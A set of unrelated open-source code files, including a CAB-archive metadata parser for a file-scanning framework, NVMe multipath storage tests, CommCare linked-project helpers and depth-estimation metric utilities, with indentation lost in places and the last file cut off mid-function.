env0 = EnvvarCollector({'a': '0', 'd': '1'})
env1 = EnvvarCollector({'a': '5', 'd': '5'}, {'d', 'c'})
self.assertEqual({'a': '5'}, env0.merge(env1).filtered().map)
self.assertEqual({'a': '0'}, env1.merge(env0).filtered().map)
self.assertSetEqual({'d', 'c'}, env0.merge(env1).to_remove)
self.assertSetEqual({'d', 'c'}, env1.merge(env0).to_remove)
    def test_filtered_removed_all_envvars(self):
env = EnvvarCollector({'a': '5', 'd': '5'}, {'a', 'd'})
result = env.filtered()
self.assertDictEqual({}, result.map)
self.assertSetEqual(set(), result.to_remove)
    def test_filtered_removed_some_envvars(self):
env = EnvvarCollector({'a': '5', 'd': '5'}, {'a'})
result = env.filtered()
self.assertDictEqual({'d': '5'}, result.map)
self.assertSetEqual(set(), result.to_remove)
    def test_filtered_removed_no_envvars(self):
envvars = {'a': '5', 'd': '5'}
env = EnvvarCollector(envvars)
result = env.filtered()
self.assertDictEqual(envvars, result.map)
self.assertSetEqual(set(), result.to_remove)
|
fsf-server/modules/EXTRACT_CAB.py | akniffe1/fsf | 259 | 12659037 | <gh_stars>100-1000
#!/usr/bin/env python
#
# Author: <NAME>
# Description: Unpack CAB using cabextract as a helper.
# Basically returns a stream of all the uncompressed contents,
# multiple files are lumped together for displacement by other modules.
# Date: 12/02/2015
# Reference: http://download.microsoft.com/download/5/0/1/501ED102-E53F-4CE0-AA6B-B0F93629DDC6/Exchange/[MS-CAB].pdf
'''
Copyright 2016 Emerson Electric Co.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import sys
import os
import subprocess
from datetime import datetime as dt
from tempfile import mkstemp
from distutils.spawn import find_executable
from struct import pack, unpack
from collections import OrderedDict
def get_flag_enums(value):
db = {}
db['cfhdrPREV_CABINET'] = True if value == 0x1 else False
db['cfhdrNEXT_CABINET'] = True if value == 0x2 else False
db['cfhdrRESERVE_PRESENT'] = True if value == 0x4 else False
return db
def get_compression_type(value):
if value == 0x0: return 'None'
if value == 0x1: return 'MSZIP'
if value == 0x2: return 'QUANTUM'
if value == 0x3: return 'LZX'
return 'Unknown'
def last_modified(date, time):
year = (date >> 9) + 1980
month = (date >> 5) & 0xf
day = date & 0x1f
hour = time >> 11
minute = (time >> 5) & 0x3f
second = (time << 1) & 0x3e
return dt(year, month, day, hour, minute, second).__str__()
def get_attributes(attribs):
attributes = []
if attribs & 0x1: attributes.append('Read-only file')
if attribs & 0x2: attributes.append('Hidden file')
if attribs & 0x4: attributes.append('System file')
if attribs & 0x20: attributes.append('Modified since last backup')
if attribs & 0x40: attributes.append('Run after extraction')
if attribs & 0x80: attributes.append('Name contains UTF')
return attributes
# Use cabextract as a helper to get the data from various MS compression formats
def collect_cab(cabname, tmpfile):
cabextract_location = find_executable('cabextract')
args = [cabextract_location, '-F', cabname, '-p', tmpfile]
proc = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
decompressed = proc.stdout.read()
proc.communicate()
# CAB will return 0 if successful
if proc.returncode:
s.dbg_h.error('%s There was a problem getting data from the cab file...' % dt.now())
return decompressed
def parse_cab(buff, tmpfile):
# CFHEADER structure
magic = buff[0:4]
reserved1 = buff[4:8]
cbCabinet = unpack('<L', buff[8:12])[0]
reserved2 = buff[12:16]
coffFiles = unpack('<L', buff[16:20])[0]
reserved3 = buff[20:24]
versionMinor = ord(buff[24])
versionMajor = ord(buff[25])
cFolders = unpack('<H', buff[26:28])[0]
cFiles = unpack('<H', buff[28:30])[0]
flags = get_flag_enums(unpack('<H', buff[30:32])[0])
setID = unpack('<H', buff[32:34])[0]
iCabinet = unpack('<H', buff[34:36])[0]
# Optional fields of CFHEADER depending on flags field settings
cbCFHeader = unpack('<H', buff[36:38])[0] if flags['cfhdrRESERVE_PRESENT'] else 0
    # Per the MS-CAB spec, cbCFFolder is the byte at offset 38 and cbCFData at offset 39
    cbCFFolder = ord(buff[38]) if flags['cfhdrRESERVE_PRESENT'] else 0
    cbCFData = ord(buff[39]) if flags['cfhdrRESERVE_PRESENT'] else 0
# Track offset due to optional/variable fields - end of CFHEADER structure
offset = 40 if flags['cfhdrRESERVE_PRESENT'] else 36
if flags['cfhdrRESERVE_PRESENT'] and cbCFHeader != 0:
abReserve = buff[offset:offset+cbCFHeader]
offset += cbCFHeader
if flags['cfhdrPREV_CABINET']:
# CabinetPrev
str_end = buff[offset:].index('\x00')
szCabinetPrev = buff[offset:offset+str_end]
offset += str_end+1
# DiskPrev
str_end = buff[offset:].index('\x00')
szDiskPrev = buff[offset:offset+str_end]
offset += str_end+1
if flags['cfhdrNEXT_CABINET']:
# CabinetNext
str_end = buff[offset:].index('\x00')
szCabinetNext = buff[offset:offset+str_end]
offset += str_end+1
# DiskNext
str_end = buff[offset:].index('\x00')
szDiskNext = buff[offset:offset+str_end]
offset += str_end+1
# CFFOLDER structure
counter = 0
compression_types = []
while counter < cFolders:
coffCabStart = unpack('<L', buff[offset:offset+4])[0]
cCfData = unpack('<H', buff[offset+4:offset+6])[0]
typeCompress = unpack('<H', buff[offset+6:offset+8])[0] & 0xf # MASK_TYPE
offset += 8
if flags['cfhdrRESERVE_PRESENT'] and cbCFFolder != 0:
cffolder_abReserve = buff[offset:offset+cbCFFolder]
offset += cbCFFolder
compression_types.append(get_compression_type(typeCompress))
counter += 1
# Collect CFHEADER and CFFOLDER meta
EXTRACT_CAB = OrderedDict([('ID', hex(setID)),
('Version', '%s.%s' % (versionMajor, versionMinor)),
('Compression Used', sorted(set(compression_types)))])
# CFFILE structure
counter = 0
while counter < cFiles:
cbFile = unpack('<L', buff[offset:offset+4])[0]
uoffFolderStart = unpack('<L', buff[offset+4:offset+8])[0]
iFolder = unpack('<H', buff[offset+8:offset+10])[0]
date = unpack('<H', buff[offset+10:offset+12])[0]
time = unpack('<H', buff[offset+12:offset+14])[0]
attribs = unpack('<H', buff[offset+14:offset+16])[0]
str_end = buff[offset+16:].index('\x00')
szName = buff[offset+16:offset+16+str_end].replace('\\','/')
offset += 16+str_end+1
# Collect CFFILE Meta
EXTRACT_CAB['Object_%s' % counter] = OrderedDict([('Name', szName),
('Last Modified', last_modified(date, time)),
('Attributes', get_attributes(attribs)),
('Buffer', collect_cab(szName, tmpfile))])
counter += 1
return EXTRACT_CAB
def EXTRACT_CAB(s, buff):
EXTRACT_CAB = {}
# Prepare the cab file to be extracted file by file by cabextract (does the heavy lifting)
tmpfd, tmpfile = mkstemp(suffix='.cab')
tmpf = os.fdopen(tmpfd, 'wb')
try:
tmpf.write(buff)
tmpf.close()
EXTRACT_CAB = parse_cab(buff, tmpfile)
finally:
os.remove(tmpfile)
return EXTRACT_CAB
if __name__ == '__main__':
# For testing, s object can be None type if unused in function
print (EXTRACT_CAB(None, sys.stdin.read()))
|
note8/code/infer.py | fluffyrita/LearnPaddle | 367 | 12659047 | <reponame>fluffyrita/LearnPaddle<filename>note8/code/infer.py<gh_stars>100-1000
# coding=utf-8
import gzip
import paddle.v2 as paddle
from network_conf import Model
from reader import DataGenerator
from decoder import ctc_greedy_decoder
from utils import get_file_list, load_dict, load_reverse_dict
def infer_batch(inferer, test_batch, labels, reversed_char_dict):
    # Get the initial prediction results
infer_results = inferer.infer(input=test_batch)
num_steps = len(infer_results) // len(test_batch)
probs_split = [
infer_results[i * num_steps:(i + 1) * num_steps]
for i in xrange(0, len(test_batch))
]
results = []
    # Greedy best-path decoding
for i, probs in enumerate(probs_split):
output_transcription = ctc_greedy_decoder(
probs_seq=probs, vocabulary=reversed_char_dict)
results.append(output_transcription)
    # Print the prediction results
    for result, label in zip(results, labels):
        print("\nPredicted: %s\nGround truth: %s" % (result, label))
def infer(model_path, image_shape, label_dict_path,infer_file_list_path):
infer_file_list = get_file_list(infer_file_list_path)
    # Load the label dictionary
    char_dict = load_dict(label_dict_path)
    # Load the reversed label dictionary
    reversed_char_dict = load_reverse_dict(label_dict_path)
    # Get the dictionary size
    dict_size = len(char_dict)
    # Create the data reader
    data_generator = DataGenerator(char_dict=char_dict, image_shape=image_shape)
    # Initialize PaddlePaddle
    paddle.init(use_gpu=True, trainer_count=2)
    # Load the trained parameters
    parameters = paddle.parameters.Parameters.from_tar(gzip.open(model_path))
    # Build the network model
    model = Model(dict_size, image_shape, is_infer=True)
    # Create the inferer
    inferer = paddle.inference.Inference(output_layer=model.log_probs, parameters=parameters)
    # Start inference
test_batch = []
labels = []
for i, (image, label) in enumerate(data_generator.infer_reader(infer_file_list)()):
test_batch.append([image])
labels.append(label)
infer_batch(inferer, test_batch, labels, reversed_char_dict)
if __name__ == "__main__":
    # Images to run inference on
    infer_file_list_path = '../data/test_data/Challenge2_Test_Task3_GT.txt'
    # Path to the trained model
    model_path = '../models/params_pass.tar.gz'
    # Image size
    image_shape = (173, 46)
    # Path to the label dictionary
    label_dict_path = '../data/label_dict.txt'
    # Run inference
infer(model_path, image_shape, label_dict_path, infer_file_list_path)
|
tools/contributors.py | WarrDaddy/owasp-mstg | 9,156 | 12659079 | import json
import requests
url = 'https://api.github.com/repos/OWASP/owasp-mstg/stats/contributors'
headers = {'Accept' : 'application/vnd.github.v3+json'}
r = requests.get(url, headers=headers)
data = r.json()
coAuthor = "Author/Co-Authors: "
topContributors = "Top Contributors: "
contributors = "Contributors: "
miniContributors = "Mini Contributors: "
additions = ''
for authors in data[:]:
# print(authors['weeks'])
# print(authors['author']['login'])
# print(authors['weeks'])
count = 0
# count additions for each author
for allWeeks in authors['weeks']:
count += allWeeks['a']
if (count >= 2000):
# author = "Co-Author: "+authors['author']['login']
# additions = author + " Additions:" + str(count)
# print(additions)
coAuthor += authors['author']['login']+", "
elif ((count >= 500) and (count <2000)):
# author = "Top Contributors: "+authors['author']['login']
# additions = author + " Additions:" + str(count)
# print(additions)
topContributors += authors['author']['login']+", "
elif ((count >= 50) and (count <500)):
# author = "Contributors: "+authors['author']['login']
# additions = author + " Additions:" + str(count)
# print(additions)
contributors += authors['author']['login']+", "
elif ((count >= 1) and (count <50)):
# author = "Mini Contributors: "+authors['author']['login']
# additions = author + " Additions:" + str(count)
# print(additions)
miniContributors += authors['author']['login']+", "
print(coAuthor+"\n")
print(topContributors+"\n")
print(contributors+"\n")
print(miniContributors+"\n") |
seq2seq_construction/__init__.py | HKUNLP/UnifiedSKG | 191 | 12659097 | <filename>seq2seq_construction/__init__.py
#
# class TrainDataset(Dataset):
#
# def __init__(self, args, raw_datasets):
# # This tab processor is for table truncation and linearize.
# self.raw_datasets = raw_datasets
#
# def __getitem__(self, index) -> T_co:
# raw_data = self.raw_datasets[index]
#
# return raw_data.update({"struct_in": struct_in, "text_in": text_in, "seq_out": seq_out})
#
#
# class DevDataset(Dataset):
#
# def __init__(self, args, raw_datasets):
# # This tab processor is for table truncation and linearize.
# self.raw_datasets = raw_datasets
#
# def __getitem__(self, index):
# raw_data = self.raw_datasets[index]
#
# return raw_data.update({"struct_in": struct_in, "text_in": text_in, "seq_out": seq_out})
#
#
# class TestDataset(Dataset):
#
# def __init__(self, args, raw_datasets):
# # This tab processor is for table truncation and linearize.
# self.raw_datasets = raw_datasets
#
# def __getitem__(self, index):
# raw_data = self.raw_datasets[index]
#
# return raw_data.update({"struct_in": struct_in, "text_in": text_in, "seq_out": seq_out})
|
test/python/tests/ana_client/test_ana_client.py | reitermarkus/mayastor | 236 | 12659116 | import pytest
from common.mayastor import container_mod, mayastor_mod
from common.nvme import (
nvme_connect,
nvme_disconnect,
nvme_disconnect_all,
nvme_list_subsystems,
identify_namespace,
)
import uuid
import mayastor_pb2 as pb
import os
POOL_NAME = "pool1"
NEXUS_GUID = "afebdeb9-ff44-1111-2222-254f810ba34a"
@pytest.fixture
def create_replicas(mayastor_mod):
ms0 = mayastor_mod.get("ms0")
ms1 = mayastor_mod.get("ms1")
replicas = []
for m in (ms0, ms1):
p = m.pool_create(POOL_NAME, "malloc:///disk0?size_mb=100")
assert p.state == pb.POOL_ONLINE
r = m.replica_create(POOL_NAME, str(uuid.uuid4()), 32 * 1024 * 1024)
replicas.append(r.uri)
yield replicas
for m in (ms0, ms1):
try:
m.pool_destroy(POOL_NAME)
except Exception:
pass
@pytest.fixture
def create_nexuses(mayastor_mod, create_replicas):
uris = []
nvme_disconnect_all()
for n in ["ms2", "ms3"]:
ms = mayastor_mod.get(n)
ms.nexus_create(NEXUS_GUID, 32 * 1024 * 1024, create_replicas)
uri = ms.nexus_publish(NEXUS_GUID)
uris.append(uri)
yield uris
nvme_disconnect_all()
for n in ["ms2", "ms3"]:
ms = mayastor_mod.get(n)
ms.nexus_destroy(NEXUS_GUID)
def connect_multipath_nexuses(uris):
dev1 = nvme_connect(uris[0])
dev2 = None
try:
dev2 = nvme_connect(uris[1])
except Exception:
# The first connect is allowed to fail due to controller ID collision.
pass
if dev2 is None:
dev2 = nvme_connect(uris[1])
return (dev1, dev2)
@pytest.mark.asyncio
async def test_io_policy(create_replicas, create_nexuses, mayastor_mod):
devs = connect_multipath_nexuses(create_nexuses)
assert devs[0] == devs[1], "Paths are different for multipath nexus"
# Make sure all we see exactly 2 paths and all paths are 'live optimized'
device = devs[0]
descr = nvme_list_subsystems(device)
paths = descr["Subsystems"][0]["Paths"]
assert len(paths) == 2, "Number of paths to Nexus mismatches"
for p in paths:
assert p["State"] == "live"
assert p["ANAState"] == "optimized"
# Make sure there are 2 virtual NVMe controllers for the namespace.
ns = os.path.basename(device)
for i in range(2):
cname = ns.replace("n1", "c%dn1" % i)
cpath = "/sys/block/%s" % cname
l = os.readlink(cpath)
assert l.startswith(
"../devices/virtual/nvme-fabrics/ctl/"
), "Path device is not a virtual controller"
# Make sure virtual NVMe namespace exists for multipath nexus.
l = os.readlink("/sys/block/%s" % ns)
assert l.startswith(
"../devices/virtual/nvme-subsystem/nvme-subsys"
), "No virtual NVMe subsystem exists for multipath Nexus"
# Make sure I/O policy is NUMA.
subsys = descr["Subsystems"][0]["Name"]
pfile = "/sys/class/nvme-subsystem/%s/iopolicy" % subsys
assert os.path.isfile(pfile), "No iopolicy file exists"
with open(pfile) as f:
iopolicy = f.read().strip()
assert iopolicy == "numa", "I/O policy is not NUMA"
# Make sure ANA state is reported properly for both nexuses.
for n in ["ms2", "ms3"]:
ms = mayastor_mod.get(n)
nexuses = ms.nexus_list_v2()
assert len(nexuses) == 1, "Number of nexuses mismatches"
assert (
nexuses[0].ana_state == pb.NVME_ANA_OPTIMIZED_STATE
), "ANA state of nexus mismatches"
@pytest.mark.asyncio
async def test_namespace_guid(create_replicas, create_nexuses, mayastor_mod):
uri = create_nexuses[0]
device = nvme_connect(uri)
ns = identify_namespace(device)
nvme_disconnect(uri)
# Namespace's GUID must match Nexus GUID.
assert uuid.UUID(ns["nguid"]) == uuid.UUID(
NEXUS_GUID
), "Namespace NGID doesn't match Nexus GUID"
# Extended Unique Identifier must be zero.
assert ns["eui64"] == "0000000000000000", "Namespace EUI64 is not zero"
|
ast/testdata/func_defaults.py | MaxTurchin/pycopy-lib | 126 | 12659154 | <filename>ast/testdata/func_defaults.py
def foo(a, b=1, c=3):
pass
|
corehq/apps/linked_domain/dbaccessors.py | andyasne/commcare-hq | 471 | 12659184 | from django.db.models.expressions import RawSQL
from corehq import toggles
from corehq.apps.accounting.utils import domain_has_privilege
from corehq.apps.domain.models import Domain
from corehq.apps.linked_domain.models import DomainLink, DomainLinkHistory
from corehq.apps.linked_domain.util import (
is_available_upstream_domain,
is_domain_available_to_link,
user_has_admin_access_in_all_domains,
)
from corehq.privileges import RELEASE_MANAGEMENT
from corehq.util.quickcache import quickcache
@quickcache(['domain'], timeout=60 * 60)
def get_upstream_domain_link(domain):
"""
:returns: ``DomainLink`` object linking this domain to its upstream
or None if no link exists
"""
return DomainLink.objects.filter(linked_domain=domain).first()
@quickcache(['domain'], timeout=60 * 60)
def is_active_upstream_domain(domain):
return DomainLink.objects.filter(master_domain=domain).exists()
@quickcache(['domain'], timeout=60 * 60)
def is_active_downstream_domain(domain):
return DomainLink.objects.filter(linked_domain=domain).exists()
@quickcache(['domain'], timeout=60 * 60)
def get_linked_domains(domain, include_deleted=False):
"""
:param domain:
:return: List of ``DomainLink`` objects for each domain linked to this one.
"""
manager = DomainLink.all_objects if include_deleted else DomainLink.objects
return list(manager.filter(master_domain=domain).all())
def get_actions_in_domain_link_history(link):
return DomainLinkHistory.objects.filter(link=link).annotate(row_number=RawSQL(
'row_number() OVER (PARTITION BY model, model_detail ORDER BY date DESC)',
[]
))
def get_available_domains_to_link(upstream_domain_name, user, billing_account=None):
"""
This supports both the old feature flagged version of linked projects and the GAed version
The GAed version is only available to enterprise customers and only usable by admins, but the feature flagged
version is available to anyone who can obtain access (the wild west)
:param upstream_domain_name: potential upstream domain candidate
:param user: user object
:param billing_account: optional parameter to limit available domains to within an enterprise account
:return: list of domain names available to link as downstream projects
"""
if domain_has_privilege(upstream_domain_name, RELEASE_MANAGEMENT):
return get_available_domains_to_link_for_account(upstream_domain_name, user, billing_account)
elif toggles.LINKED_DOMAINS.enabled(upstream_domain_name):
return get_available_domains_to_link_for_user(upstream_domain_name, user)
return []
def get_available_domains_to_link_for_account(upstream_domain_name, user, account):
"""
Finds available domains to link based on domains associated with the provided account
"""
domains = account.get_domains() if account else []
return list({domain for domain in domains
if is_domain_available_to_link(upstream_domain_name, domain, user)})
def get_available_domains_to_link_for_user(upstream_domain_name, user):
"""
Finds available domains to link based on domains that the provided user is active in
"""
domains = [d.name for d in Domain.active_for_user(user)]
return list({domain for domain in domains if is_domain_available_to_link(
upstream_domain_name, domain, user, should_enforce_admin=False)})
def get_available_upstream_domains(downstream_domain, user, billing_account=None):
"""
This supports both the old feature flagged version of linked projects and the GAed version
The GAed version is only available to enterprise customers and only usable by admins, but the feature flagged
version is available to anyone who can obtain access
:param downstream_domain: potential upstream domain candidate
:param user: user object
:param billing_account: optional parameter to limit available domains to within an enterprise account
:return: list of domain names available to link as downstream projects
"""
if domain_has_privilege(downstream_domain, RELEASE_MANAGEMENT):
return get_available_upstream_domains_for_account(downstream_domain, user, billing_account)
elif toggles.LINKED_DOMAINS.enabled(downstream_domain):
return get_available_upstream_domains_for_user(downstream_domain, user)
return []
def get_available_upstream_domains_for_account(downstream_domain, user, account):
domains = account.get_domains() if account else []
return list({d for d in domains if is_available_upstream_domain(d, downstream_domain, user)})
def get_available_upstream_domains_for_user(domain_name, user):
domains = [d.name for d in Domain.active_for_user(user)]
return list({domain for domain in domains
if is_available_upstream_domain(domain, domain_name, user, should_enforce_admin=False)})
def get_accessible_downstream_domains(upstream_domain_name, user):
"""
Returns a list of domain names that actively linked downstream of the provided upstream domain
NOTE: if the RELEASE_MANAGEMENT privilege is enabled, ensure user has admin access
"""
downstream_domains = [d.linked_domain for d in get_linked_domains(upstream_domain_name)]
if domain_has_privilege(upstream_domain_name, RELEASE_MANAGEMENT):
return [domain for domain in downstream_domains
if user_has_admin_access_in_all_domains(user, [upstream_domain_name, domain])]
return downstream_domains
|
python/ql/test/library-tests/exprs/compare/compare.py | vadi2/codeql | 4,036 | 12659192 |
a < b < c
x in y
x not in y
x is y
x is not y
x < y
x > y
x >= y
x <= y
x == y
x != y
|
gossip/util/message_code.py | Gokul1077/PytGossip | 122 | 12659199 | <reponame>Gokul1077/PytGossip<filename>gossip/util/message_code.py
# Copyright 2016 <NAME>, <NAME>, <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__author__ = '<NAME>, <NAME>, <NAME>'
MESSAGE_CODE_ANNOUNCE = 500
MESSAGE_CODE_NOTIFY = 501
MESSAGE_CODE_NOTIFICATION = 502
MESSAGE_CODE_VALIDATION = 503
MESSAGE_CODE_PEER_REQUEST = 510
MESSAGE_CODE_PEER_RESPONSE = 511
MESSAGE_CODE_PEER_UPDATE = 512
MESSAGE_CODE_PEER_INIT = 513
MESSAGE_CODE_GOSSIP_MIN = 500
MESSAGE_CODE_GOSSIP_MAX = 520
|
PIXOR/utils_func.py | mileyan/mileyan | 152 | 12659213 | import torch
import losswise
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
class Metric(object):
def __init__(self):
self.RMSELIs = AverageMeter()
self.RMSELGs = AverageMeter()
self.ABSRs = AverageMeter()
self.SQRs = AverageMeter()
self.DELTA = AverageMeter()
self.DELTASQ = AverageMeter()
self.DELTACU = AverageMeter()
self.losses = AverageMeter()
def update(self, loss, RMSE_Linear, RMSE_Log, abs_relative, sq_relative, delta, delta_sq, delta_cu):
if loss:
self.losses.update(loss)
self.RMSELIs.update(RMSE_Linear)
self.RMSELGs.update(RMSE_Log)
self.ABSRs.update(abs_relative)
self.SQRs.update(sq_relative)
self.DELTA.update(delta)
self.DELTASQ.update(delta_sq)
self.DELTACU.update(delta_cu)
def get_info(self):
return [self.losses.avg, self.RMSELIs.avg, self.RMSELGs.avg, self.ABSRs.avg, self.SQRs.avg, self.DELTA.avg,
self.DELTASQ.avg, self.DELTACU.avg]
def calculate(self, depth, predict, loss=None):
# only consider 1~80 meters
mask = (depth >= 1) * (depth <= 80)
RMSE_Linear = ((((predict[mask] - depth[mask]) ** 2).mean()) ** 0.5).cpu().detach().item()
RMSE_Log = ((((torch.log(predict[mask]) - torch.log(depth[mask])) ** 2).mean()) ** 0.5).cpu().detach().item()
abs_relative = (torch.abs(predict[mask] - depth[mask]) / depth[mask]).mean().cpu().detach().item()
sq_relative = ((predict[mask] - depth[mask]) ** 2 / depth[mask]).mean().cpu().detach().item()
delta = (torch.max(predict[mask] / depth[mask], depth[mask] / predict[mask]) < 1.25).float().mean().cpu().detach().item()
delta_sq = (torch.max(predict[mask] / depth[mask],
depth[mask] / predict[mask]) < 1.25 ** 2).float().mean().cpu().detach().item()
delta_cu = (torch.max(predict[mask] / depth[mask],
depth[mask] / predict[mask]) < 1.25 ** 3).float().mean().cpu().detach().item()
self.update(loss, RMSE_Linear, RMSE_Log, abs_relative, sq_relative, delta, delta_sq, delta_cu)
def tensorboard(self, writer, epoch, token='train'):
writer.add_scalar(token + '/RMSELIs', self.RMSELIs.avg, epoch)
writer.add_scalar(token + '/RMSELGs', self.RMSELGs.avg, epoch)
writer.add_scalar(token + '/ABSRs', self.ABSRs.avg, epoch)
writer.add_scalar(token + '/SQRs', self.SQRs.avg, epoch)
writer.add_scalar(token + '/DELTA', self.DELTA.avg, epoch)
writer.add_scalar(token + '/DELTASQ', self.DELTASQ.avg, epoch)
writer.add_scalar(token + '/DELTACU', self.DELTACU.avg, epoch)
def print(self, iter, token):
string = '{}:{}\tL {:.3f} RLI {:.3f} RLO {:.3f} ABS {:.3f} SQ {:.3f} DEL {:.3f} DELQ {:.3f} DELC {:.3f}'.format(token, iter, *self.get_info())
return string
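# Usage sketch for Metric (added; the tensors below are synthetic and only meant to
# show the calling convention, not real KITTI data):
#
#   metric = Metric()
#   depth = torch.rand(2, 1, 128, 128) * 79 + 1            # ground truth in [1, 80] m
#   predict = depth + 0.5 * torch.randn_like(depth).abs()  # fake prediction, > 0
#   metric.calculate(depth, predict, loss=0.0)
#   print(metric.print(0, 'VAL'))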
class LossWise(object):
def __init__(self, key=None, tag=None, epochs=300):
self.key = key
print(self.key)
if len(self.key)>0:
losswise.set_api_key(self.key)
session = losswise.Session(tag=tag, max_iter=epochs)
self.error = session.graph('Error', kind='min', display_interval=1)
self.loss = session.graph('Loss', kind='min', display_interval=1)
self.delta = session.graph('Delta', kind='min', display_interval=1)
self.session=session
def update(self, info, epoch, tag='Train'):
if len(self.key)>0:
self.loss.append(epoch, {tag+'/loss':info[0]})
self.error.append(epoch, {tag+'/RMSE':info[1], tag+'/RMSELog':info[2],
tag+'/ABSR':info[3], tag+'/SQUR':info[4]})
self.delta.append(epoch, {tag+'/1.25':info[5],tag+'/1.25^2':info[6],
tag+'/1.25^3':info[7]})
def done(self):
self.session.done()
class LossWise1(object):
def __init__(self, key=None, tag=None, epochs=300):
self.key = key
print(self.key)
if len(self.key)>0:
losswise.set_api_key(self.key)
session = losswise.Session(tag=tag, max_iter=epochs)
self.error = session.graph('Error', kind='min', display_interval=1)
self.loss_total = session.graph('Loss', kind='min', display_interval=1)
self.delta = session.graph('Delta', kind='min', display_interval=1)
self.session=session
def update(self, info, epoch, tag='Train'):
if len(self.key)>0:
self.loss_total.append(epoch, {tag+'/loss_gt':info[0], tag+'/loss_pseudo':info[1], tag+'/loss_total':info[2]})
self.error.append(epoch, {tag+'/RMSE':info[3], tag+'/RMSELog':info[4],
tag+'/ABSR':info[5], tag+'/SQUR':info[6]})
self.delta.append(epoch, {tag+'/1.25':info[7],tag+'/1.25^2':info[8],
tag+'/1.25^3':info[9]})
def done(self):
self.session.done()
class Metric1(object):
def __init__(self):
self.RMSELIs = AverageMeter()
self.RMSELGs = AverageMeter()
self.ABSRs = AverageMeter()
self.SQRs = AverageMeter()
self.DELTA = AverageMeter()
self.DELTASQ = AverageMeter()
self.DELTACU = AverageMeter()
self.losses_gt = AverageMeter()
self.losses_pseudo = AverageMeter()
self.losses_total = AverageMeter()
def update(self, loss_gt, loss_pseudo, loss_total, RMSE_Linear, RMSE_Log, abs_relative, sq_relative, delta, delta_sq, delta_cu):
self.losses_gt.update(loss_gt)
self.losses_pseudo.update(loss_pseudo)
self.losses_total.update(loss_total)
self.RMSELIs.update(RMSE_Linear)
self.RMSELGs.update(RMSE_Log)
self.ABSRs.update(abs_relative)
self.SQRs.update(sq_relative)
self.DELTA.update(delta)
self.DELTASQ.update(delta_sq)
self.DELTACU.update(delta_cu)
def get_info(self):
return [self.losses_gt.avg, self.losses_pseudo.avg, self.losses_total.avg, self.RMSELIs.avg, self.RMSELGs.avg, self.ABSRs.avg, self.SQRs.avg, self.DELTA.avg,
self.DELTASQ.avg, self.DELTACU.avg]
def calculate(self, depth, predict, loss_gt=0, loss_psuedo=0, loss_total=0):
# only consider 1~80 meters
mask = (depth >= 1) * (depth <= 80)
RMSE_Linear = ((((predict[mask] - depth[mask]) ** 2).mean()) ** 0.5).cpu().data
RMSE_Log = ((((torch.log(predict[mask]) - torch.log(depth[mask])) ** 2).mean()) ** 0.5).cpu().data
abs_relative = (torch.abs(predict[mask] - depth[mask]) / depth[mask]).mean().cpu().data
sq_relative = ((predict[mask] - depth[mask]) ** 2 / depth[mask]).mean().cpu().data
delta = (torch.max(predict[mask] / depth[mask], depth[mask] / predict[mask]) < 1.25).float().mean().cpu().data
delta_sq = (torch.max(predict[mask] / depth[mask],
depth[mask] / predict[mask]) < 1.25 ** 2).float().mean().cpu().data
delta_cu = (torch.max(predict[mask] / depth[mask],
depth[mask] / predict[mask]) < 1.25 ** 3).float().mean().cpu().data
self.update(loss_gt, loss_psuedo, loss_total, RMSE_Linear, RMSE_Log, abs_relative, sq_relative, delta, delta_sq, delta_cu)
def tensorboard(self, writer, epoch, token='train'):
writer.add_scalar(token + '/RMSELIs', self.RMSELIs.avg, epoch)
writer.add_scalar(token + '/RMSELGs', self.RMSELGs.avg, epoch)
writer.add_scalar(token + '/ABSRs', self.ABSRs.avg, epoch)
writer.add_scalar(token + '/SQRs', self.SQRs.avg, epoch)
writer.add_scalar(token + '/DELTA', self.DELTA.avg, epoch)
writer.add_scalar(token + '/DELTASQ', self.DELTASQ.avg, epoch)
writer.add_scalar(token + '/DELTACU', self.DELTACU.avg, epoch)
def print(self, iter, token):
string = '{}:{}\tL {:.3f} {:.3f} {:.3f} RLI {:.3f} RLO {:.3f} ABS {:.3f} SQ {:.3f} DEL {:.3f} DELQ {:.3f} DELC {:.3f}'.format(token, iter, *self.get_info())
return string
def roty_pth(t):
''' Rotation about the y-axis. '''
c = torch.cos(t)
s = torch.sin(t)
return torch.FloatTensor([[c, 0, s],
[0, 1, 0],
[-s, 0, c]])
class torchCalib(object):
def __init__(self, calib, h_shift=0):
self.P2 = torch.from_numpy(calib.P).cuda().float() # 3 x 4
self.P2[1, 2] -= h_shift
# self.P3 = torch.from_numpy(calib.P3).cuda() # 3 x 4
self.R0 = torch.from_numpy(calib.R0).cuda().float() # 3 x 3
self.V2C = torch.from_numpy(calib.V2C).cuda().float() # 3 x 4
self.C2V = torch.from_numpy(calib.C2V).cuda().float()
# Camera intrinsics and extrinsics
self.cu = self.P2[0, 2]
self.cv = self.P2[1, 2]
self.fu = self.P2[0, 0]
self.fv = self.P2[1, 1]
self.tx = self.P2[0, 3] / (-self.fu)
self.ty = self.P2[1, 3] / (-self.fv)
def cart_to_hom(self, pts):
"""
:param pts: (N, 3 or 2)
:return pts_hom: (N, 4 or 3)
"""
ones = torch.ones((pts.shape[0], 1), dtype=torch.float32).cuda()
pts_hom = torch.cat((pts, ones), dim=1)
return pts_hom
def rect_to_lidar(self, pts_rect):
"""
:param pts_rect: (N, 3)
:return pts_lidar: (N, 3)
"""
pts_hom = self.cart_to_hom(torch.matmul(
pts_rect, torch.inverse(self.R0.t())))
pts_rect = torch.matmul(pts_hom, self.C2V.t())
return pts_rect
def lidar_to_rect(self, pts_lidar):
"""
:param pts_lidar: (N, 3)
:return pts_rect: (N, 3)
"""
